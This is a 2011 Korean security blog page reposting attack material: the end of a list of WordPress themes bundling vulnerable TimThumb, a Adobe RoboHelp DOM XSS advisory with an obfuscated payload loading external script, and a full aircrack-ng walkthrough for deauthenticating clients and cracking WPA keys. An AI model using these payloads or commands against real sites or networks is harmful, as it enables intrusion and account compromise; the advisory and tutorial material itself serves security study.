the-theme/core/libs/thumbnails/thumb.php
thrillingtheme/thumb.php
tm-theme/js/timthumb.php
totallyred/scripts/timthumb.php
travelogue-theme/scripts/timthumb.php
true-blue-theme/timthumb.php
ttnews-theme/timthumb.php
twittplus/scripts/timthumb.php
typographywp/timthumb.php
ugly/timthumb.php
unity/timthumb.php
versitility/timthumb.php
vibefolio-teaser-10/scripts/timthumb.php
vina/thumb.php
whitemag/script/thumb.php
wpapi/thumb.php
wpbus-d4/includes/timthumb.php
wp-creativix/scripts/timthumb.php
wp-newsmagazine/scripts/timthumb.php
wp-perfect/js/timthumb.php
wp-premium-orange/timthumb.php
xiando-one/thumb.php
zcool-like/timthumb.php
zcool-like/uploadify.php

Caution: This is not a full list of every theme in the directory that may include TimThumb, just a good start. Even if your theme is not found on this list it is a good idea to do a thorough review for the script, and not a bad thought to contact the theme author.

Note: We only listed the free themes found in the WordPress Free Themes Directory SVN, there are probably many more themes that include TimThumb in the premium theme market. Make sure to check with your vendor to ensure the vulnerability has been fixed if they include the script.

Edit: Thanks to @ottodestruct for clarifying that not all of these themes are approved and/or available to the public via the WordPress Free Themes Directory. Although they are currently found in the theme repository, they are not all publicly available for download.


취약점 시연 동영상

This video is a demonstration of the TimThumbCraft tool, which in short creates an image with appended PHP code, directly usable with the TimThumb Vulnerability, that exists in many Wordpress themes.

This video, tool AND blog entry were made for Ethical and Educational Purposes Only!
직역 : 이 비디오, 툴 그리고 블로그의 모든 내용은 윤리적이고 교육용을 위한 목적으로만 제안합니다.



저작자표시 비영리 변경금지

'위험한_친구들 > 코디_Editor' 카테고리의 다른 글

iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability  (0) 2011.09.18
FCKeditor all versian Arbitrary File Upload Vulnerability  (0) 2011.08.10
Posted by bitfox
l

[spanish] Asaltando redes wifi

위험한_친구들/그림자_WIFI 2011. 8. 16. 09:40
스페인어로된 오랜만에 올라오는 개념있는 글이다.
wifi에 삽질한 자로써 읽어보면 이해 하실듯.. :-)

[spanish]_Asaltando_redes_wifi.pdf



[출처] http://www.exploit-db.com/
저작자표시 비영리 변경금지

'위험한_친구들 > 그림자_WIFI' 카테고리의 다른 글

Book : Backtrack 5 Wireless Penetration Testing by Vivek Ramachandran  (0) 2011.09.15
How to crack a WEP key and decrypt live traffic  (0) 2011.08.20
Tutorial: How to Crack WPA/WPA2  (0) 2011.08.10
WIFI와 스마트폰 (RogueAP)  (0) 2010.10.28
WIFI와 스마트폰 (wifi공격툴 시현)  (0) 2010.10.28
Posted by bitfox
l

Adobe RoboHelp 9 DOM Cross Site Scripting

위험한_친구들/십자군_XSS 2011. 8. 16. 09:20

Back in May while doing an application intrusion testing, I have found an interesting DOM Cross Site Scripting in a part of the application which was generated with Adobe RoboHelp software. At the begin, I thought I have found a bug which was already discovered and a Google search seemed to confirm my doubt, as I couldn't find out what Adobe RoboHelp version was used. However, all the bug entries I could find looked different and some of them were lacking an accurate description, payloads and examples.

So I have decided to download the latest version of Adobe RoboHelp and give it a try. Funny enough, after five minutes I have found another DOM cross site scripting injection point! It seems that RoboHelp has a history with XSS bugs (probably because it is just HTML and JavaScript content after all).

It is worth to say that at that time I also a got a preview of the DOMinator tool developed by Stefano Di Paola and wanted to test it and see if it would find the same bug. By browsing the site with DOMinator, in a matter of few seconds I could see the red alert showing up and highlighting the same vulnerable point. It is definitely a tool to try when looking for DOM XSS bugs.

Advisory

Name: Adobe RoboHelp 9.0 – DOM Cross Site Scripting
Vendor: Website http://www.adobe.com
Date Released: August 11th, 2011 – CVE-2011-2133
Affected Software: versions 9.0.1.232 and earlier
Researcher: Roberto Suggi Liverani

Original Security Advisory (PDF): http://www.security-assessment.com/files/documents/advisory/Adobe_RoboHelp_9_-_DOM_XSS.pdf

Description

Web content generated by Adobe RoboHelp software using the WebHelp format is vulnerable to DOM (or type-0) Cross Site Scripting attacks. The issue is due to the use of unsafe JavaScript code handling by the location.hash DOM property. This property is employed to load a frame within the context of a web site generated with RoboHelp. However, a malicious user can send a link which includes JavaScript code in the fragment part of the URL scheme, as demonstrated in the following example:

JavaScript Injection:
http://example.com/WebHelp/index.html#%22onload=%22JAVASCRIPT_PAYLOAD_HERE

In this case, use of the double quote character allows injection of frame attributes and event handlers, such as onload. The onload handler can be used to execute arbitrary JavaScript code. The above injection will result as the following in the DOM context of the index.html page:

Injection in the DOM:
<frame scrolling="auto" name="bsscright" title="Topic" border="1" frameborder="1" id="topic" onload="JAVASCRIPT_PAYLOAD_HERE" src=""></frame>

Exploitation

This vulnerability can be exploited in several ways. One example is to include an external JavaScript file, such as a JavaScript hook file provided by BEeF, the browser exploitation framework. The exploit below makes use of the String.fromCharCode method to specify the URI of an external JavaScript file. In this example, it points to "http://malerisch.net/a.js", a JavaScript PoC (Proof of Concept) file which pops up an alert message window:

DOM XSS Including External JavaScript File
http://example.com/WebHelp/index.htm#%22onload=%22a=document.createElement%28%27script%27%29;a.setAttribute%28%27src%27,String.fromCharCode%28104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115%29%29;document.body.appendChild%28a%29

Rendered in DOM:

<frame scrolling="auto" name="bsscright" title="Topic" border="1" frameborder="1" id="topic" onload="a=document.createElement('script');a.setAttribute('src',String.fromCharCode(104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115));document.body.appendChild(a);" src=""></frame>



The above attack has been successfully reproduced with the following browser/OS:

- Firefox 3.5.16 – Windows XP SP3
- Google Chrome 11.0.696.69 – Windows XP SP3
- IE 8.0.6001.18702 – Windows XP SP3
- Opera 11.10 – build 2092 – Windows XP SP3

Solution

Adobe validated this security issue and updated the Adobe RoboHelp software to address this issue.

The fix is incorporated in the updates which can be found at the following URL:

http://www.adobe.com/support/security/bulletins/apsb11-23.html

Security-Assessment.com recommends applying the updates provided by the vendor.


[출처]http://malerisch.net/docs/advisories/adobe_robohelp_dom_cross_site_scripting_xss.html

저작자표시 비영리 변경금지

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

HTML Code Injection and Cross-site scripting  (0) 2011.08.31
XSS-Harvest / xss-harvest.pl  (0) 2011.08.29
Mailto: Crash (may crash you)  (0) 2011.08.08
XSS BASIC SITE  (0) 2011.08.08
Clipboard 내용 유출  (0) 2010.10.28
Posted by bitfox
l

Tutorial: How to Crack WPA/WPA2

위험한_친구들/그림자_WIFI 2011. 8. 10. 15:06

[출처] http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Introduction

This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial.

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.

The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required.

IMPORTANT This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

I would like to acknowledge and thank the Aircrack-ng team for producing such a great robust tool.

Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.

Assumptions

First, this solution assumes:

  • You are using drivers patched for injection. Use the injection test to confirm your card can inject.
  • You are physically close enough to send and receive access point and wireless client packets. Remember that just because you can receive packets from them does not mean you may will be able to transmit packets to them. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by both the AP and the wireless client. You can confirm that you can communicate with the specific AP by following these instructions.
  • You are using v0.9.1 or above of aircrack-ng. If you use a different version then some of the command options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change “ath0” to the interface name which is specific to your wireless card.

Equipment used

In this tutorial, here is what was used:

  • MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
  • MAC address of the wireless client using WPA2: 00:0F:B5:FD:FB:C2
  • BSSID (MAC address of access point): 00:14:6C:7E:40:80
  • ESSID (Wireless network name): teddy
  • Access point channel: 9
  • Wireless interface: ath0

You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.

Solution

Solution Overview

The objective is to capture the WPA/WPA2 authentication handshake and then use aircrack-ng to crack the pre-shared key.

This can be done either actively or passively. “Actively” means you will accelerate the process by deauthenticating an existing wireless client. “Passively” means you simply wait for a wireless client to authenticate to the WPA/WPA2 network. The advantage of passive is that you don't actually need injection capability and thus the Windows version of aircrack-ng can be used.

Here are the basic steps we will be going through:

  1. Start the wireless interface in monitor mode on the specific AP channel
  2. Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
  3. Use aireplay-ng to deauthenticate the wireless client
  4. Run aircrack-ng to crack the pre-shared key using the authentication handshake

Step 1 - Start the wireless interface in monitor mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. Normally your card will only “hear” packets addressed to you. By hearing every packet, we can later capture the WPA/WPA2 4-way handshake. As well, it will allow us to optionally deauthenticate a wireless client in a later step.

The exact procedure for enabling monitor mode varies depending on the driver you are using. To determine the driver (and the correct procedure to follow), run the following command: 

 airmon-ng

On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds: 

 Interface       Chipset         Driver
 
 rausb0          Ralink RT73     rt73
 wlan0           Broadcom        b43 - [phy0]
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0)

The presence of a [phy0] tag at the end of the driver name is an indicator for mac80211, so the Broadcom card is using a mac80211 driver. Note that mac80211 is supported only since aircrack-ng v1.0-rc1, and it won't work with v0.9.1. Both entries of the Atheros card show “madwifi-ng” as the driver - follow the madwifi-ng-specific steps to set up the Atheros card. Finally, the Ralink shows neither of these indicators, so it is using an ieee80211 driver - see the generic instructions for setting it up.

Step 1a - Setting up madwifi-ng

First stop ath0 by entering: 

 airmon-ng stop ath0

The system responds: 

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter “iwconfig” to ensure there are no other athX interfaces. It should look similar to this: 

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run “iwconfig” to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode: 

 airmon-ng start wifi0 9

Note: In this command we use “wifi0” instead of our wireless interface of “ath0”. This is because the madwifi-ng drivers are being used.

The system will respond: 

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

You will notice that “ath0” is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter “iwconfig”.

The system will respond: 

 lo        no wireless extensions.
 
 wifi0     no wireless extensions.
 
 eth0      no wireless extensions.
 
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Only the madwifi-ng drivers show the card MAC address in the AP field, other drivers do not. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.

Step 1b - Setting up mac80211 drivers

Unlike madwifi-ng, you do not need to remove the wlan0 interface when setting up mac80211 drivers. Instead, use the following command to set up your card in monitor mode on channel 9: 

 airmon-ng start wlan0 9

The system responds: 

 Interface       Chipset         Driver
 
 wlan0           Broadcom        b43 - [phy0]
                                 (monitor mode enabled on mon0)

Notice that airmon-ng enabled monitor-mode on mon0. So, the correct interface name to use in later parts of the tutorial is mon0. Wlan0 is still in regular (managed) mode, and can be used as usual, provided that the AP that wlan0 is connected to is on the same channel as the AP you are attacking, and you are not performing any channel-hopping.

To confirm successful setup, run “iwconfig”. The following output should appear: 

 lo        no wireless extensions.
 eth0      no wireless extensions.
 
 wmaster0  no wireless extensions.
 
 wlan0     IEEE 802.11bg  ESSID:""
           Mode:Managed  Frequency:2.452 GHz  Access Point: Not-Associated
           Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0
 
 mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.452 GHz  Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Here, mon0 is seen as being in monitor mode, on channel 9 (2.452GHz). Unlike madwifi-ng, the monitor interface has no Access Point field at all. Also notice that wlan0 is still present, and in managed mode - this is normal. Because both interfaces share a common radio, they must always be tuned to the same channel - changing the channel on one interface also changes channel on the other one.

Step 1c - Setting up other drivers

For other (ieee80211-based) drivers, simply run the following command to enable monitor mode (replace rausb0 with your interface name): 

 airmon-ng start rausb0 9

The system responds: 

 Interface       Chipset         Driver
 
 rausb0          Ralink          rt73 (monitor mode enabled)

At this point, the interface should be ready to use.

Step 2 - Start airodump-ng to collect authentication handshake

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.

Enter: 

 airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Where:

  • -c 9 is the channel for the wireless network
  • --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
  • -w psk is the file name prefix for the file which will contain the IVs.
  • ath0 is the interface name.

Important: Do NOT use the ”--ivs” option. You must capture the full packets.

Here what it looks like if a wireless client is connected to the network: 

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116

In the screen above, notice the “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients: 

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes

Troubleshooting Tip

See the Troubleshooting Tips section below for ideas.

To see if you captured any handshake packets, there are two ways. Watch the airodump-ng screen for ” WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.

Use Wireshark and apply a filter of “eapol”. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets.

Step 3 - Use aireplay-ng to deauthenticate the wireless client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter: 

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Where:

  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send multiple if you wish)
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • ath0 is the interface name

Here is what the output looks like: 

 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

With luck this causes the client to reauthenticate and yield the 4-way handshake.

Troubleshooting Tips

  • The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.

Step 4 - Run aircrack-ng to crack the pre-shared key

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.

There is a small dictionary that comes with aircrack-ng - “password.lst”. This file can be found in the “test” directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper (JTR) to generate your own list and pipe them into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.

Open another console session and enter: 

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Where:

  • -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
  • *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Here is typical output when there are no handshakes found: 

 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.

 No valid WPA handshakes found.

When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP.

Here is typical output when handshakes are found: 

 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.
 
 #  BSSID              ESSID                     Encryption

 1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)
 
 Choosing first network as target.

Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.

Here is what successfully cracking the pre-shared key looks like: 

                               Aircrack-ng 0.8
 
 
                 [00:00:00] 2 keys tested (37.20 k/s)
 
 
                         KEY FOUND! [ 12345678 ]
 
 
    Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E 
                     B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD 
 
    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 
                     CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 
                     FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 
                     2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 
 
    EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

Troubleshooting Tips

I Cannot Capture the Four-way Handshake!

It can sometimes be tricky to capture the four-way handshake. Here are some troubleshooting tips to address this:

  • Your monitor card must be in the same mode as the both the client and Access Point. So, for example, if your card was in “B” mode and the client/AP were using “G” mode, then you would not capture the handshake. This is especially important for new APs and clients which may be “turbo” mode and/or other new standards. Some drivers allow you to specify the mode. Also, iwconfig has an option “modulation” that can sometimes be used. Do “man iwconfig” to see the options for “modulation”. For information, 1, 2, 5.5 and 11Mbit are 'b', 6, 9, 12, 18, 24, 36, 48, 54Mbit are 'g'.
  • Sometimes you also need to set the monitor-mode card to the same speed. IE auto, 1MB, 2MB, 11MB, 54MB, etc.
  • Be sure that your capture card is locked to the same channel as the AP. You can do this by specifying ”-c <channel of AP>” when you start airodump-ng.
  • Be sure there are no connection managers running on your system. This can change channels and/or change mode without your knowledge.
  • You are physically close enough to receive both access point and wireless client packets. The wireless card strength is typically less then the AP strength.
  • Conversely, if you are too close then the received packets can be corrupted and discarded. So you cannot be too close.
  • Make sure to use the drivers specified on the wiki. Depending on the driver, some old versions do not capture all packets.
  • Ideally, connect and disconnect a wireless client normally to generate the handshake.
  • If you use the deauth technique, send the absolute minimum of packets to cause the client to reauthenticate. Normally this is a single deauth packet. Sending an excessive number of deauth packets may cause the client to fail to reconnect and thus it will not generate the four-way handshake. As well, use directed deauths, not broadcast. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.
  • Try stopping the radio on the client station then restarting it.
  • Make sure you are not running any other program/process that could interfere such as connection managers, Kismet, etc.
  • Review your captured data using the WPA Packet Capture Explained tutorial to see if you can identify the problem. Such as missing AP packets, missing client packets, etc.

Unfortunately, sometimes you need to experiment a bit to get your card to properly capture the four-way handshake. The point is, if you don't get it the first time, have patience and experiment a bit. It can be done!

Another approach is to use Wireshark to review and analyze your packet capture. This can sometimes give you clues as to what is wrong and thus some ideas on how to correct it. The WPA Packet Capture Explained tutorial is a companion to this tutorial and walks you through what a “normal” WPA connection looks like. As well, see the FAQ for detailed information on how to use Wireshark.

In an ideal world, you should use a wireless device dedicated to capturing the packets. This is because some drivers such as the RTL8187L driver do not capture packets the card itself sends. Also, always use the driver versions specified on the wiki. This is because some older versions of the drivers such as the RT73 driver did not capture client packets.

When using Wireshark, the filter “eapol” will quickly display only the EAPOL packets. Based on what EAPOL packets are actually in the capture, determine your correction plan. For example, if you are missing the client packets then try to determine why and how to collect client packets.

To dig deep into the packet analysis, you must start airodump-ng without a BSSID filter and specify the capture of the full packet, not just IVs. Needless to say, it must be locked to the AP channel. The reason for eliminating the BSSID filter is to ensure all packets including acknowledgments are captured. With a BSSID filter, certain packets are dropped from the capture.

Every packet sent by client or AP must be acknowledged. This is done with an “acknowledgment” packet which has a destination MAC of the device which sent the original packet. If you are trying to deauthenticate a client, one thing to check is that you receive the “ack” packet. This confirms the client received the deauth packet. Failure to receive the “ack” packet likely means that the client is out of transmission range. Thus failure.

When it comes to analyzing packet captures, it is impossible to provide detailed instructions. I have touched on some techniques and areas to look at. This is an area which requires effort to build your skills on both WPA/WPA2 plus how to use Wireshark.

aircrack-ng says "0 handshakes"

Check the “I Cannot Capture the Four-way Handshake!” troubleshooting tip.

aircrack-ng says "No valid WPA handshakes found"

Check the “I Cannot Capture the Four-way Handshake!” troubleshooting tip.


저작자표시 비영리 변경금지

'위험한_친구들 > 그림자_WIFI' 카테고리의 다른 글

Book : Backtrack 5 Wireless Penetration Testing by Vivek Ramachandran  (0) 2011.09.15
How to crack a WEP key and decrypt live traffic  (0) 2011.08.20
[spanish] Asaltando redes wifi  (0) 2011.08.16
WIFI와 스마트폰 (RogueAP)  (0) 2010.10.28
WIFI와 스마트폰 (wifi공격툴 시현)  (0) 2010.10.28
Posted by bitfox
l
◀ 이전페이지 1 2 3 4 5 다음페이지 ▶
블로그 이미지
작은여우와 암행어사 IT Security Consulting History bitfox

최근에 올라온 글

공지사항

글 보관함

최근에 받은 트랙백

  • Total :
  • Today :
  • Yesterday :
tistory 티스토리 가입하기!
rss

카테고리

분류 전체보기 (190)
Hello_World! (24)
위험한_친구들 (50)
수술_도구 (20)
생각하는_보안 (20)
삽질이라쓰고_경험이라_읽는다. (10)
글로벌_Gossip (28)
나의 관심 (10)
도전_리버서 (5)
도전_외래어 (5)
a Shot a Day (18)

달력

«   2024/04   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30

링크

티스토리툴바